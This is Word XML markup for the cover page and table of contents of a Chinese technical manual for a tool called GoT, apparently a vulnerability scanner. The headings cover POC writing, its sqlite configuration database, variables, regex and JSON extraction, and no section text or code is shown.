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6FEF4" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006F6ADA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="773B0F1C" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="00DF258B" w:rsidP="006F6ADA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F6ADA">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>GoT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778BEF78" w14:textId="6FEFE599" w:rsidR="006F6ADA" w:rsidRPr="006F6ADA" w:rsidRDefault="00191D11" w:rsidP="006F6ADA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>技术文档</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D53B3F1" w14:textId="055F2276" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006F6ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CC960C7" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006F6ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E5BCB5" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006F6ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="600116F0" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006F6ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A7D888D" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37220623" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D9978D" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28AF898C" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BCD461D" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A60C05F" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E3F3D1A" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C2B35C" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41E1BF2D" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EC21516" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D4F6EE1" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06EEBD99" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F616A2C" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FF40268" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="191C2941" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="632FD60E" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C366FE" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB2687C" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="394D0026" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E74F5B3" w14:textId="77777777" w:rsidR="008C040F" w:rsidRDefault="008C040F" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5415E3A2" w14:textId="7E5DF68D" w:rsidR="006F6ADA" w:rsidRPr="008C040F" w:rsidRDefault="006F6ADA" w:rsidP="008C040F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C040F">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>编写时间：</w:t>
      </w:r>
      <w:r w:rsidRPr="008C040F">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>2024/</w:t>
      </w:r>
      <w:r w:rsidR="00A44207">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>08</w:t>
      </w:r>
      <w:r w:rsidRPr="008C040F">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00A44207">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C69EF9" w14:textId="33CD8C07" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006F6ADA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="-6669436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F2AB84" w14:textId="5D42F0E2" w:rsidR="006F6ADA" w:rsidRPr="00AB61A5" w:rsidRDefault="006F6ADA">
          <w:pPr>
            <w:pStyle w:val="TOC"/>
            <w:rPr>
              <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00AB61A5">
            <w:rPr>
              <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
              <w:color w:val="auto"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>目录</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2B7CAB28" w14:textId="0B1F2D5B" w:rsidR="00FF0906" w:rsidRDefault="006F6ADA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467005" w:history="1">
            <w:r w:rsidR="00FF0906" w:rsidRPr="001755FA">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>一，POC编写模块介绍</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171467005 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68BED4C1" w14:textId="64C60B70" w:rsidR="00FF0906" w:rsidRDefault="00000000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71467006" w:history="1">
            <w:r w:rsidR="00FF0906" w:rsidRPr="001755FA">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1 数据库sqlite</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171467006 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7BF4D06E" w14:textId="187358D4" w:rsidR="00FF0906" w:rsidRDefault="00000000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71467007" w:history="1">
            <w:r w:rsidR="00FF0906" w:rsidRPr="001755FA">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2 Config.db介绍</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171467007 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79ED0C16" w14:textId="67F74E85" w:rsidR="00FF0906" w:rsidRDefault="00000000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71467008" w:history="1">
            <w:r w:rsidR="00FF0906" w:rsidRPr="001755FA">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3 Vulnerability 表介绍</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171467008 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15F59936" w14:textId="606778D8" w:rsidR="00FF0906" w:rsidRDefault="00000000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71467009" w:history="1">
            <w:r w:rsidR="00FF0906" w:rsidRPr="001755FA">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>二，POC编写和使用</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171467009 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A0371C8" w14:textId="3FEFC1C0" w:rsidR="00FF0906" w:rsidRDefault="00000000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71467010" w:history="1">
            <w:r w:rsidR="00FF0906" w:rsidRPr="001755FA">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1 简单的POC编写</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171467010 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4130ABDF" w14:textId="4F17378F" w:rsidR="00FF0906" w:rsidRDefault="00000000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71467011" w:history="1">
            <w:r w:rsidR="00FF0906" w:rsidRPr="001755FA">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2 复杂的POC编写</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171467011 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="033E55EB" w14:textId="0D2A4381" w:rsidR="00FF0906" w:rsidRDefault="0000000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71467012" w:history="1">
            <w:r w:rsidR="00FF0906" w:rsidRPr="001755FA">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.1 变量</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171467012 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0972CBED" w14:textId="3F5BAA35" w:rsidR="00FF0906" w:rsidRDefault="0000000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71467013" w:history="1">
            <w:r w:rsidR="00FF0906" w:rsidRPr="001755FA">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.2 regex 正则表达式</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171467013 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1405F561" w14:textId="7B54A2D3" w:rsidR="00FF0906" w:rsidRDefault="0000000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71467014" w:history="1">
            <w:r w:rsidR="00FF0906" w:rsidRPr="001755FA">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.3 JSON 以Json的键取值</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171467014 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03AAAC31" w14:textId="43A35023" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA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4141E8A" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRPr="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006F6ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74892A6D" w14:textId="77777777" w:rsidR="006E4760" w:rsidRDefault="006E4760" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0099CCD0" w14:textId="77777777" w:rsidR="006F6ADA" w:rsidRDefault="006F6ADA" w:rsidP="006E4760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
